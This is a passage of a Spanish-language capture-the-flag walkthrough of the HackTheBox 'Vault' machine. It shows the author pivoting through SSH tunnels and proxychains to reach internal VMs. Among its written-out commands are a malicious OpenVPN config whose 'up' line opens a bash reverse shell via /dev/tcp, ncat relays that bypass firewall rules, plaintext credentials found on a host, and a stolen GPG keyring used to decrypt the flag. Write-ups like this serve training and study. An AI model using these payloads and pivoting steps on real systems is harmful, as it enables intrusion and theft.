8: vnet3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master virbr0 state UNKNOWN group default qlen 1000
link/ether fe:54:00:17:ab:49 brd ff:ff:ff:ff:ff:ff
inet6 fe80::fc54:ff:fe17:ab49/64 scope link
valid_lft forever preferred_lft forever
dave@ubuntu:~$ ip r
default via 10.10.10.2 dev ens33 onlink
10.10.10.0/24 dev ens33 proto kernel scope link src 10.10.10.109
169.254.0.0/16 dev ens33 scope link metric 1000
192.168.122.0/24 dev virbr0 proto kernel scope link src 192.168.122.1
Para llegar a los Servers usamos la interface virbr0, la cual tiene una dirección en el mismo segmento de los indicados en servidores.
Veamos las conexiones:
dave@ubuntu:~/Desktop$ netstat -pltune
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name
tcp 0 0 127.0.0.1:5902 0.0.0.0:* LISTEN 64055 29708 -
tcp 0 0 192.168.122.1:53 0.0.0.0:* LISTEN 0 27851 -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 0 28563 -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 0 31186 -
tcp 0 0 127.0.0.1:5900 0.0.0.0:* LISTEN 64055 28042 -
tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN 64055 28331 -
tcp6 0 0 :::80 :::* LISTEN 0 22789 -
tcp6 0 0 :::22 :::* LISTEN 0 28565 -
tcp6 0 0 ::1:631 :::* LISTEN 0 31185 -
tcp6 0 0 :::1337 :::* LISTEN 1001 77658 3370/chisel
udp 0 0 0.0.0.0:5353 0.0.0.0:* 111 22601 -
udp 0 0 0.0.0.0:38310 0.0.0.0:* 111 22603 -
udp 0 0 192.168.122.1:53 0.0.0.0:* 0 27850 -
udp 0 0 0.0.0.0:67 0.0.0.0:* 0 27847 -
udp 0 0 0.0.0.0:631 0.0.0.0:* 0 31196 -
udp6 0 0 :::5353 :::* 111 22602 -
udp6 0 0 :::34539 :::* 111 22604 -
Interesante, en localhost tenemos varios servicios corriendo, inclusive algunos ejecutandose desde el usuario con ID 64055. Veamos quien es este usuario:
dave@ubuntu:~$ cat /etc/passwd | grep 64055
libvirt-qemu:x:64055:129:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
Vemos que se trata de libvirt-qemu, lo cual nos hace click con el nombre de las interfaces que vimos antes. Esto significa que tenemos al menos 3 maquinas virtuales (de acuerdo al documento anterior) que están virtualizadas sobre ubuntu.
Veamos los procesos de las maquinas virtuales:
dave@ubuntu:~/Desktop$ ps -fea
{OMITIDO}
libvirt+ 1711 1 4 Mar16 ? 00:07:45 qemu-system-x86_64 -enable-kvm -name DNS -S -machine pc-i440fx-xenial,accel=kvm,usb=off -cpu qemu32 -m 1024 -realtime mlock=off -smp 1,sockets=1,cores=1,threads=1 -uuid 4c7b43f8-23d1-4e7d-a219-d55eb0c899a6 -no-user-config -nodefaults -chardev socket,id=charmonitor,path=/var/lib/libvirt/qemu/domain-DNS/monitor.sock,server,nowait -mon chardev=charmonitor,id=monitor,mode=control -rtc base=utc,driftfix=slew -global kvm-pit.lost_tick_policy=discard -no-hpet -no-shutdown -global PIIX4_PM.disable_s3=1 -global PIIX4_PM.disable_s4=1 -boot strict=on -device ich9-usb-ehci1,id=usb,bus=pci.0,addr=0x6.0x7 -device ich9-usb-uhci1,masterbus=usb.0,firstport=0,bus=pci.0,multifunction=on,addr=0x6 -device ich9-usb-uhci2,masterbus=usb.0,firstport=2,bus=pci.0,addr=0x6.0x1 -device ich9-usb-uhci3,masterbus=usb.0,firstport=4,bus=pci.0,addr=0x6.0x2 -device virtio-serial-pci,id=virtio-serial0,bus=pci.0,addr=0x5 -drive file=/var/lib/libvirt/images/DNS.qcow2,format=qcow2,if=none,id=drive-ide0-0-0 -device ide-hd,bus=ide.0,unit=0,drive=drive-ide0-0-0,id=ide0-0-0,bootindex=1 -drive if=none,id=drive-ide0-0-1,readonly=on -device ide-cd,bus=ide.0,unit=1,drive=drive-ide0-0-1,id=ide0-0-1 -netdev tap,fd=25,id=hostnet0 -device rtl8139,netdev=hostnet0,id=net0,mac=52:54:00:17:ab:49,bus=pci.0,addr=0x3 -chardev pty,id=charserial0 -device isa-serial,chardev=charserial0,id=serial0 -chardev spicevmc,id=charchannel0,name=vdagent -device virtserialport,bus=virtio-serial0.0,nr=1,chardev=charchannel0,id=channel0,name=com.redhat.spice.0 -spice port=5900,addr=127.0.0.1,disable-ticketing,image-compression=off,seamless-migration=on -device qxl-vga,id=video0,ram_size=67108864,vram_size=67108864,vgamem_mb=16,bus=pci.0,addr=0x2 -device intel-hda,id=sound0,bus=pci.0,addr=0x4 -device hda-duplex,id=sound0-codec0,bus=sound0.0,cad=0 -chardev spicevmc,id=charredir0,name=usbredir -device usb-redir,chardev=charredir0,id=redir0 -chardev spicevmc,id=charredir1,name=usbredir -device usb-redir,chardev=charredir1,id=redir1 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x7 -msg timestamp=on
root 1729 2 0 Mar16 ? 00:00:00 [kvm-pit/1711]
libvirt+ 1878 1 3 Mar16 ? 00:06:28 qemu-system-x86_64 -enable-kvm -name Firewall -S -machine pc-i440fx-xenial,accel=kvm,usb=off -cpu qemu32 -m 1024 -realtime mlock=off -smp 1,sockets=1,cores=1,threads=1 -uuid cd3065e0-8cff-4ca0-99e8-9f2b545467a8 -no-user-config -nodefaults -chardev socket,id=charmonitor,path=/var/lib/libvirt/qemu/domain-Firewall/monitor.sock,server,nowait -mon chardev=charmonitor,id=monitor,mode=control -rtc base=utc,driftfix=slew -global kvm-pit.lost_tick_policy=discard -no-hpet -no-shutdown -global PIIX4_PM.disable_s3=1 -global PIIX4_PM.disable_s4=1 -boot strict=on -device ich9-usb-ehci1,id=usb,bus=pci.0,addr=0x7.0x7 -device ich9-usb-uhci1,masterbus=usb.0,firstport=0,bus=pci.0,multifunction=on,addr=0x7 -device ich9-usb-uhci2,masterbus=usb.0,firstport=2,bus=pci.0,addr=0x7.0x1 -device ich9-usb-uhci3,masterbus=usb.0,firstport=4,bus=pci.0,addr=0x7.0x2 -device virtio-serial-pci,id=virtio-serial0,bus=pci.0,addr=0x6 -drive file=/var/lib/libvirt/images/Firewall.qcow2,format=qcow2,if=none,id=drive-ide0-0-0 -device ide-hd,bus=ide.0,unit=0,drive=drive-ide0-0-0,id=ide0-0-0,bootindex=1 -drive if=none,id=drive-ide0-0-1,readonly=on -device ide-cd,bus=ide.0,unit=1,drive=drive-ide0-0-1,id=ide0-0-1 -netdev tap,fd=26,id=hostnet0 -device rtl8139,netdev=hostnet0,id=net0,mac=52:54:00:3a:3b:d5,bus=pci.0,addr=0x3 -netdev tap,fd=28,id=hostnet1 -device rtl8139,netdev=hostnet1,id=net1,mac=52:54:00:e1:74:41,bus=pci.0,addr=0x4 -chardev pty,id=charserial0 -device isa-serial,chardev=charserial0,id=serial0 -chardev spicevmc,id=charchannel0,name=vdagent -device virtserialport,bus=virtio-serial0.0,nr=1,chardev=charchannel0,id=channel0,name=com.redhat.spice.0 -spice port=5901,addr=127.0.0.1,disable-ticketing,image-compression=off,seamless-migration=on -device qxl-vga,id=video0,ram_size=67108864,vram_size=67108864,vgamem_mb=16,bus=pci.0,addr=0x2 -device intel-hda,id=sound0,bus=pci.0,addr=0x5 -device hda-duplex,id=sound0-codec0,bus=sound0.0,cad=0 -chardev spicevmc,id=charredir0,name=usbredir -device usb-redir,chardev=charredir0,id=redir0 -chardev spicevmc,id=charredir1,name=usbredir -device usb-redir,chardev=charredir1,id=redir1 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x8 -msg timestamp=on
root 1896 2 0 Mar16 ? 00:00:00 [kvm-pit/1878]
libvirt+ 1977 1 3 Mar16 ? 00:06:21 qemu-system-x86_64 -enable-kvm -name Vault -S -machine pc-i440fx-xenial,accel=kvm,usb=off -cpu qemu32 -m 1024 -realtime mlock=off -smp 1,sockets=1,cores=1,threads=1 -uuid 5c8d1542-2e9b-405a-a1a1-5435f25bf154 -no-user-config -nodefaults -chardev socket,id=charmonitor,path=/var/lib/libvirt/qemu/domain-Vault/monitor.sock,server,nowait -mon chardev=charmonitor,id=monitor,mode=control -rtc base=utc,driftfix=slew -global kvm-pit.lost_tick_policy=discard -no-hpet -no-shutdown -global PIIX4_PM.disable_s3=1 -global PIIX4_PM.disable_s4=1 -boot strict=on -device ich9-usb-ehci1,id=usb,bus=pci.0,addr=0x6.0x7 -device ich9-usb-uhci1,masterbus=usb.0,firstport=0,bus=pci.0,multifunction=on,addr=0x6 -device ich9-usb-uhci2,masterbus=usb.0,firstport=2,bus=pci.0,addr=0x6.0x1 -device ich9-usb-uhci3,masterbus=usb.0,firstport=4,bus=pci.0,addr=0x6.0x2 -device virtio-serial-pci,id=virtio-serial0,bus=pci.0,addr=0x5 -drive file=/var/lib/libvirt/images/Vault.qcow2,format=qcow2,if=none,id=drive-ide0-0-0 -device ide-hd,bus=ide.0,unit=0,drive=drive-ide0-0-0,id=ide0-0-0,bootindex=1 -drive if=none,id=drive-ide0-0-1,readonly=on -device ide-cd,bus=ide.0,unit=1,drive=drive-ide0-0-1,id=ide0-0-1 -netdev tap,fd=27,id=hostnet0 -device rtl8139,netdev=hostnet0,id=net0,mac=52:54:00:c6:70:66,bus=pci.0,addr=0x3 -chardev pty,id=charserial0 -device isa-serial,chardev=charserial0,id=serial0 -chardev spicevmc,id=charchannel0,name=vdagent -device virtserialport,bus=virtio-serial0.0,nr=1,chardev=charchannel0,id=channel0,name=com.redhat.spice.0 -spice port=5902,addr=127.0.0.1,disable-ticketing,image-compression=off,seamless-migration=on -device qxl-vga,id=video0,ram_size=67108864,vram_size=67108864,vgamem_mb=16,bus=pci.0,addr=0x2 -device intel-hda,id=sound0,bus=pci.0,addr=0x4 -device hda-duplex,id=sound0-codec0,bus=sound0.0,cad=0 -chardev spicevmc,id=charredir0,name=usbredir -device usb-redir,chardev=charredir0,id=redir0 -chardev spicevmc,id=charredir1,name=usbredir -device usb-redir,chardev=charredir1,id=redir1 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x7 -msg timestamp=on
root 1997 2 0 Mar16 ? 00:00:00 [kvm-pit/1977]
Armando una rápida tabla sobre esta información tenemos:
name | MAC | SPICE |
---|---|---|
DNS | 52:54:00:17:ab:49 | spice://127.0.0.1:5900 |
Firewall | 52:54:00:3a:3b:d5 and 52:54:00:e1:74:41 | spice://127.0.0.1:5901 |
Vault | 52:54:00:c6:70:66 | spice://127.0.0.1:5902 |
Como la maquina se llama Vault, debemos llegar hasta ella. Copie las MAC para observar y tratar de determinar una topología de L2 que nos pueda ayudar a entender como se intercomunican y mas aun, como desde ubuntu podemos llegar.
El spice es importante porque básicamente podemos conectarnos a cualquier maquina y tener la salida del monitor.
Veamos que tenemos en nuestra tabla de ARP:
dave@ubuntu:~$ arp -a
? (192.168.122.4) at 52:54:00:17:ab:49 [ether] on virbr0
? (10.10.10.2) at 00:50:56:aa:9c:8d [ether] on ens33
? (192.168.122.5) at 52:54:00:3a:3b:d5 [ether] on virbr0
Tenemos las dos direcciones IP del archivo Server que ahora podemos correlacionar con las MAC. Como podemos observar nos hacen falta 2 MAC, lo que nos indica que por L2 no tenemos acceso, forzándonos a comprender que dichas MAC se encuentran en otro segmento de red. Si, Firewall tiene dos tarjetas, por lo que una da directo hacia ubuntu (en L3) y la otra va hacia otro bridge entre Vault y Firewall.
Tunneling from ubuntu
Ahora que hemos comprendido que desde ubuntu tenemos que llegar a DNS y Firewall, viene el problema de que no sabemos nada mas que sus direcciones IP. Enumerando un poco mas el servicio SSH que estamos usando actualmente, encontraremos que para nuestra fortuna algunas opciones están habilitadas para hacer una dirección de puertos:
dave@ubuntu:~$ cat /etc/ssh/sshd_config | grep -Ev '^$|^#'
Port 22
Protocol 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
HostKey /etc/ssh/ssh_host_ed25519_key
UsePrivilegeSeparation yes
KeyRegenerationInterval 3600
ServerKeyBits 1024
SyslogFacility AUTH
LogLevel INFO
LoginGraceTime 120
PermitRootLogin prohibit-password
StrictModes yes
RSAAuthentication yes
PubkeyAuthentication yes
IgnoreRhosts yes
RhostsRSAAuthentication no
HostbasedAuthentication no
PermitEmptyPasswords no
ChallengeResponseAuthentication no
X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog yes
TCPKeepAlive yes
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
UsePAM yes
AllowTCPForwarding yes
GatewayPorts yes
PermitOpen any
MaxSessions 1000000
PermitTunnel yes
Esto nos permite establecer una VPN de SSH en la cual mandamos sobre una conexión de SSH trafico como si ubuntu generar el trafico. Esta técnica era bastante utilizada antes, cuando por ejemplo te querías conectar desde un cibercafé a tu casa o si no confiabas en la red, podías tunelear todo tu trafico hasta tu casa y usar tu salida a internet.
Primero definimos un puerto que acepte todas las conexiones y que se convierta en el listener o en el proxy:
xbytemx@laptop:~/htb/vault$ ssh -f -N -D 9050 dave@10.10.10.109
dave@10.10.10.109's password:
-f
-N
-D 9050
dave@10.10.10.109
Después usando proxychains, el cual por defecto usa el puerto 9050 y la ip 127.0.0.1, ejecuta sobre la conexión un nmap por ejemplo:
root@laptop:~# proxychains nmap -sT --open -n -v 192.168.122.5
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-17 17:39 CST
Initiating Ping Scan at 17:39
Scanning 192.168.122.5 [4 ports]
Completed Ping Scan at 17:39, 0.23s elapsed (1 total hosts)
Initiating Connect Scan at 17:39
Scanning 192.168.122.5 [1000 ports]
Completed Connect Scan at 17:42, 154.31s elapsed (1000 total ports)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 154.64 seconds
Raw packets sent: 4 (152B) | Rcvd: 1 (40B)
Las opciones son muy parecida a las anteriores, con la diferencia que para este escaneo utilice -sT
en lugar de -sS
, ya que por mi topología tuneleada, necesito establecer conexiones completas en lugar de solo mandar SYN.
También en este escaneo hacia Firewall, podemos ver que ningún puerto contesto como abierto. Continuemos sobre DNS:
# Nmap 7.70 scan initiated Sun Mar 17 17:42:45 2019 as: nmap -sT --open -n -v -oN DNS-proxychains-nmap.nmap 192.168.122.4
Nmap scan report for 192.168.122.4
Host is up (0.15s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Read data files from: /usr/bin/../share/nmap
# Nmap done at Sun Mar 17 17:45:17 2019 -- 1 IP address (1 host up) scanned in 152.10 seconds
Ahora en la salida de este archivo (DNS-proxychains-nmap.nmap) podemos ver que DNS tiene dos puertos abiertos, uno es el 22 y el otro el 80.
Utilizando httpie
exploremos el servidor web:
xbytemx@laptop:~/htb/vault$ proxychains http 192.168.122.4
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.122.4:80-<><>-OK
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Encoding: gzip
Content-Length: 153
Content-Type: text/html; charset=UTF-8
Date: Sun, 17 Mar 2019 23:47:16 GMT
Keep-Alive: timeout=5, max=100
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
<h1> Welcome to the Sparklays DNS Server </h1>
<p>
<a href="dns-config.php">Click here to modify your DNS Settings</a><br>
<a href="vpnconfig.php">Click here to test your VPN Configuration</a>
Encontramos desde index.html, dos archivos más: vpnconfig.php y dns-config.php. Veamos su contenido:
xbytemx@laptop:~/htb/vault$ proxychains http 192.168.122.4/dns-config.php
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.122.4:80-<><>-OK
HTTP/1.1 404 Not Found
Connection: Keep-Alive
Content-Length: 291
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 17 Mar 2019 23:47:27 GMT
Keep-Alive: timeout=5, max=100
Server: Apache/2.4.18 (Ubuntu)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /dns-config.php was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.122.4 Port 80</address>
</body></html>
xbytemx@laptop:~/htb/vault$ proxychains http 192.168.122.4/vpnconfig.php
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.122.4:80-<><>-OK
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Encoding: gzip
Content-Length: 295
Content-Type: text/html; charset=UTF-8
Date: Sun, 17 Mar 2019 23:47:39 GMT
Keep-Alive: timeout=5, max=100
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
<!-- HTML form -->
<html>
<h1> VPN Configurator </h1><p>
Here you can modify your .ovpn file and execute it.<p>
Note: nobind must be used. <p>
<form action="vpnconfig.php?function=testvpn" method="post">
<textarea rows="10" cols="40" name="text"></textarea><p>
<input type="submit" value="Update file">
<input type="hidden" name="resulturl" value="google.com">
<p>
<a href="vpnconfig.php?function=testvpn" class="mybutton">Test VPN</a>
</html>
Parece que tenemos un configurador de OpenVPN (.ovpn) justo como el que hackthebox nos entrega para conectarnos. Esto significa que probablemente el path sea explotar alguna vulnerabilidad en OVPN que nos permita entrar a DNS.
Reverse Shell from DNS
Googleando un poco encontraremos el siguiente articulo, el cual nos explica como aprovecharnos y realizar un RCE sobre un servidor de OVPN. Usando esta técnica, desarrolle el siguiente archivo ovpn:
remote 192.168.122.1
dev tun
nobind
script-security 2
up "/bin/bash -c '/bin/bash -i > /dev/tcp/192.168.122.1/3001 0<&1 2>&1&'"
Tenemos el comando a ejecutarse después de que la vpn se levante, que es básicamente un reverse shell y el remote de la conexión, osea la maquina ubuntu. Levantamos un netcat para recibir la conexión en ubuntu y usando proxychains subimos via post el contenido del archivo ovpn:
xbytemx@laptop:~/htb/vault$ proxychains http -f POST "http://192.168.122.4/vpnconfig.php?function=testvpn" submit="Update file" text="remote 192.168.122.1\ndev tun\nnobind\nscript-security 2\nup \"/bin/bash -c \'/bin/bash -i > /dev/tcp/192.168.122.1/3001 0<&1 2>&1&\'\""
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.122.4:80-<><>-OK
http: error: Request timed out (30s).
En nuestro listener debemos recibir la conexión remota de DNS:
dave@ubuntu:~$ nc -vlnp 3001
Listening on [0.0.0.0] (family 0, port 3001)
Connection from [192.168.122.4] port 3001 [tcp/*] accepted (family 2, sport 33836)
bash: cannot set terminal process group (1076): Inappropriate ioctl for device
bash: no job control in this shell
root@DNS:/var/www/html#
root@DNS:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root)
yey ya somos root! pero en DNS ):
Ahora que hemos ingresado en nuestra primera maquina, veamos que encontramos por aquí:
root@DNS:/var/www/html# cd /home
cd /home
root@DNS:/home# ls
ls
alex
dave
root@DNS:/home# cd dave
cd dave
root@DNS:/home/dave# ls
ls
ssh
user.txt
root@DNS:/home/dave# cat ssh
cat ssh
dave
dav3gerous567
Parece que tenemos otras credenciales para entrar por SSH.
dave@ubuntu:~$ ssh dave@192.168.122.4
dave@192.168.122.4's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-116-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
98 packages can be updated.
50 updates are security updates.
Last login: Mon Sep 3 16:38:03 2018
dave@DNS:~$
creds: dave / dav3gerous567
cat user.txt
root@DNS:/home/dave# cat user.txt
cat user.txt
Enumerating DNS from root
Validemos que puede hacer dave en esta maquina o porque es tan importante:
root@DNS:/home/dave# sudo -l -U dave
sudo -l -U dave
Matching Defaults entries for dave on DNS:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User dave may run the following commands on DNS:
(ALL : ALL) ALL
Gracias a sudo -s
podremos regresar a root en cualquier momento usando a dave.
Después de revolotear un poco el gallinero y tratar de identificar si DNS se conecta a Vault o a Firewall, encontraremos algo interesante sobre las rutas:
root@DNS:/home/dave# ip r
ip r
192.168.5.0/24 via 192.168.122.5 dev ens3
192.168.122.0/24 dev ens3 proto kernel scope link src 192.168.122.4
Esto nos indica que DNS se puede conectar a la red entre Firewall y Vault, mas aun que la red entre ellos es alcanzada gracias a Firewall y el segmento es 192.168.5.0/24.
Estuve buscando sobre etc y var referencias a la red 192.168.5.0/24, hasta que di con auth.log:
root@DNS:/home/dave# find /var/log/ -type f -exec grep "192.168.5." {} \;
find /var/log/ -type f -exec grep "192.168.5." {} \;
Binary file /var/log/auth.log matches
Binary file /var/log/btmp matches
root@DNS:/home/dave# grep -a "192.168.5" /var/log/auth.log
grep -a "192.168.5" /var/log/auth.log
Jul 17 16:49:01 DNS sshd[1912]: Accepted password for dave from 192.168.5.2 port 4444 ssh2
Jul 17 16:49:02 DNS sshd[1943]: Received disconnect from 192.168.5.2 port 4444:11: disconnected by user
Jul 17 16:49:02 DNS sshd[1943]: Disconnected from 192.168.5.2 port 4444
Jul 17 17:21:38 DNS sshd[1560]: Accepted password for dave from 192.168.5.2 port 4444 ssh2
Jul 17 17:21:38 DNS sshd[1590]: Received disconnect from 192.168.5.2 port 4444:11: disconnected by user
Jul 17 17:21:38 DNS sshd[1590]: Disconnected from 192.168.5.2 port 4444
Jul 17 21:58:26 DNS sshd[1171]: Accepted password for dave from 192.168.5.2 port 4444 ssh2
Jul 17 21:58:29 DNS sshd[1249]: Received disconnect from 192.168.5.2 port 4444:11: disconnected by user
Jul 17 21:58:29 DNS sshd[1249]: Disconnected from 192.168.5.2 port 4444
Jul 24 15:06:10 DNS sshd[1466]: Accepted password for dave from 192.168.5.2 port 4444 ssh2
Jul 24 15:06:10 DNS sshd[1496]: Received disconnect from 192.168.5.2 port 4444:11: disconnected by user
Jul 24 15:06:10 DNS sshd[1496]: Disconnected from 192.168.5.2 port 4444
Jul 24 15:06:26 DNS sshd[1500]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.5.2 user=dave
Jul 24 15:06:28 DNS sshd[1500]: Failed password for dave from 192.168.5.2 port 4444 ssh2
Jul 24 15:06:28 DNS sshd[1500]: Connection closed by 192.168.5.2 port 4444 [preauth]
Jul 24 15:06:57 DNS sshd[1503]: Accepted password for dave from 192.168.5.2 port 4444 ssh2
Jul 24 15:06:57 DNS sshd[1533]: Received disconnect from 192.168.5.2 port 4444:11: disconnected by user
Jul 24 15:06:57 DNS sshd[1533]: Disconnected from 192.168.5.2 port 4444
Jul 24 15:07:21 DNS sshd[1536]: Accepted password for dave from 192.168.5.2 port 4444 ssh2
Jul 24 15:07:21 DNS sshd[1566]: Received disconnect from 192.168.5.2 port 4444:11: disconnected by user
Jul 24 15:07:21 DNS sshd[1566]: Disconnected from 192.168.5.2 port 4444
Sep 2 15:07:51 DNS sudo: dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f
Sep 2 15:10:20 DNS sudo: dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 1234 --sh-exec ncat 192.168.5.2 987 -p 53
Sep 2 15:10:34 DNS sudo: dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 3333 --sh-exec ncat 192.168.5.2 987 -p 53
root@DNS:/home/dave#
Con esto sabemos que una de las dos maquinas tiene la dirección 192.168.5.2, que conoce las credenciales de dave, y que el puerto TCP/4444 es relevante para las conexiones.
Las ultimas 3 lineas indican que es posible escanear la 192.168.5.2, pero que probablemente este filtrado el puerto de origen. La penúltima y antepenúltima, que el puerto 987 esta abierto en 192.168.5.2, pero hay que redirigirlo para poder establecer una conexión.
Entonces tenemos un diagrama como el siguiente:
Connecting to Vault
Ahora que hemos comprendido mejor como podríamos bypasear las reglas del firewall, podemos construir un listener del puerto 987 de Vault:
xbytemx@laptop:~/htb/vault$ proxychains ssh dave@192.168.122.4 "ncat -l 3001 --sh-exec \"ncat 192.168.5.2 987 --source-port=4444\""
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.122.4:22-<><>-OK
The authenticity of host '192.168.122.4 (192.168.122.4)' can't be established.
ECDSA key fingerprint is SHA256:pV1weQff3mDVKDCfervdnstlBaTvDBnCu2eQfUegT3w.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.122.4' (ECDSA) to the list of known hosts.
dave@192.168.122.4's password:
Lo que hace este comando es usar el proxychain para lanzar un ssh hacia DNS, el cual lanza el comando ncat como listener en el puerto 3001, que a su vez lanza el comando ncat hacia Vault en el puerto 987, usando el puerto origen 4444 que ya vimos que esta permitido.
Con un nmap veremos que el servicio del puerto 987 de la 192.168.5.2 es en realidad un servidor SSH, por lo que conectándonos por ssh sobre el proxychains entraremos por fin a vault.
Usaremos las credenciales que encontramos en DNS sobre dave (recordemos los logs de auth):
xbytemx@laptop:~/htb/vault$ proxychains ssh dave@192.168.122.4 -p3001
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.122.4:3001-<><>-OK
The authenticity of host '[192.168.122.4]:3001 ([192.168.122.4]:3001)' can't be established.
ECDSA key fingerprint is SHA256:Wo70Zou+Hq5m/+G2vuKwUnJQ4Rwbzlqhq2e1JBdjEsg.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.122.4]:3001' (ECDSA) to the list of known hosts.
dave@192.168.122.4's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-116-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
96 packages can be updated.
49 updates are security updates.
Last login: Mon Sep 3 16:48:00 2018
dave@vault:~$ ls
root.txt.gpg
dave@vault:~$
get root.txt.gpg
Ya que entramos a Vault, encontramos un archivo en el home de dave, el cual es un archivo gpg. Lo descargamos:
xbytemx@laptop:~/htb/vault$ proxychains scp -P 3001 dave@192.168.122.4:/home/dave/root.txt.gpg .
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.122.4:3001-<><>-OK
dave@192.168.122.4's password:
Permission denied, please try again.
dave@192.168.122.4's password:
root.txt.gpg 100% 629 4.0KB/s 00:00
Explorando las maquinas, encontraremos que en ubuntu podemos acceder al secring de dave, por lo que lo descargamos e importamos:
xbytemx@laptop:~/htb/vault$ gpg --import ubuntu-gnupg/secring.gpg
gpg: clave 9067DED00FDFBFE4: clave pública "david <dave@david.com>" importada
gpg: clave 9067DED00FDFBFE4: clave secreta importada
gpg: Cantidad total procesada: 1
gpg: importadas: 1
gpg: claves secretas leídas: 1
gpg: claves secretas importadas: 1
Procedemos a usar la clave secreta importada para descifrar el archivo root.txt.gpg:
xbytemx@laptop:~/htb/vault$ gpg -d root.txt.gpg > root.txt
gpg: cifrado con clave de 4096 bits RSA, ID C778C610D1EB1F03, creada el 2018-07-24
"david <dave@david.com>"
cat root.txt
… We got root flag.
Gracias por llegar hasta aquí, hasta la próxima!